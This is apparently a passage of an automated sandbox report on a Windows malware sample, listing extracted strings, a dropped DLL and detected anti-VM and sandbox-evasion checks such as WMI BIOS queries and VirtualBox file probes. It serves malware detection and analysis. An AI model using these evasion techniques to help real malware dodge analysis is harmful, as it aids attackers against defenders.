INte-INsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPfy-NLkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INsyr-SYquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGom-ETps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGyo-NGmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRsah-RUti-ETgn-PYhaw-USla-001so-SOii-CNpap-029arn-CLar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEit-CHquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocqps-plocadsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDpa-Arab-PKnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INaz-Cyrl-AZti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUes-ESta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNquz-ECen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZzh-MOfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGde-LUfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-OMde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEes-PAsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSar-JOen-JMes-VEfr-REsms-FIar-YEen-029es-COfr-CDsr-Cyrl-MEar-KWen-PHes-CLf
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
                      Source: rundll32.exeString found in binary or memory: ./?.so;lua/lib/amd64/?.so;lua/lib/amd64/loadall.so
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\OutlookJump to behavior
                      Source: Binary string: wkernel32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.309860796.000000000232F000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.309988464.0000000002450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: WINMMBASE.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333673223.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.316124357.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315893635.000000000232D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcrt.pdb source: MqE1p1WFrf.exe, 00000001.00000003.325515967.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.325224942.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdb source: MqE1p1WFrf.exe, 00000001.00000003.319728017.000000000232D000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.320216371.00000000023F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: MqE1p1WFrf.exe, 00000001.00000003.309501419.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308672485.0000000002322000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308435345.0000000002321000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdb source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.326882570.0000000002270000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.363854408.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.314431146.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320524869.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.339607068.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.335892894.0000000002649000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314477899.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.331563420.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320396311.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: winmm.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333316141.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.326182710.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.319728017.000000000232D000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.320216371.00000000023F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdb source: MqE1p1WFrf.exe, 00000001.00000003.315606867.0000000002182000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315705538.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.314477899.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333746453.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdb source: MqE1p1WFrf.exe, 00000001.00000003.341772259.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.320396311.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314431146.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.339607068.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.335892894.0000000002649000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdb source: rundll32.exe, 00000004.00000003.358705595.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: combase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.317707376.00000000028A0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316782050.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.316124357.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315893635.000000000232D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333746453.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: WINMMBASE.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333673223.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.314533170.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315108088.00000000026BC000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: profapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332804586.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.378529171.0000017ED6FE0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000004.00000003.358705595.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ws2_32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.334391183.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314533170.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315108088.00000000026BC000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.326882570.0000000002270000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.363854408.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.341772259.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320596267.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.309501419.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308672485.0000000002322000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308435345.0000000002321000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.316556327.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316355611.0000000002325000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winmm.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333316141.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332966854.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332966854.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wmswsock.pdb source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.341846355.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312105202.0000000002270000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.316556327.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316355611.0000000002325000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.309860796.000000000232F000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.309988464.0000000002450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320596267.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.315606867.0000000002182000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315705538.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.331563420.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.334011206.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.333783737.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.326182710.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320524869.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: combase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.317707376.00000000028A0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316782050.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdb source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
                      Source: Binary string: profapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332804586.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.378529171.0000017ED6FE0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wmswsock.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.341846355.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.334011206.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.333783737.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdb source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312105202.0000000002270000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ws2_32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.334391183.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_00406060 push eax; ret 1_2_0040608E
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE9040 push rax; retf 4_2_00007FFA06EE9041
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_004081BD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004081BD
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile created: C:\Users\user\AppData\Roaming\nsis_uns60877c.dllJump to dropped file
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.357859065.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: rundll32.exeBinary or memory string: ASWHOOK.DLL
                      Queries memory information (via WMI often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
                      Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                      Checks if the current machine is a virtual machine (disk enumeration)
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-4068
                      Source: C:\Windows\System32\rundll32.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeMemory allocated: 2640000 memory commit | memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeMemory allocated: 2640000 memory commit | memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeMemory allocated: 2640000 memory commit | memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeMemory allocated: 2640000 memory commit | memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: VBoxGuestJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\vboxservice.exeJump to behavior
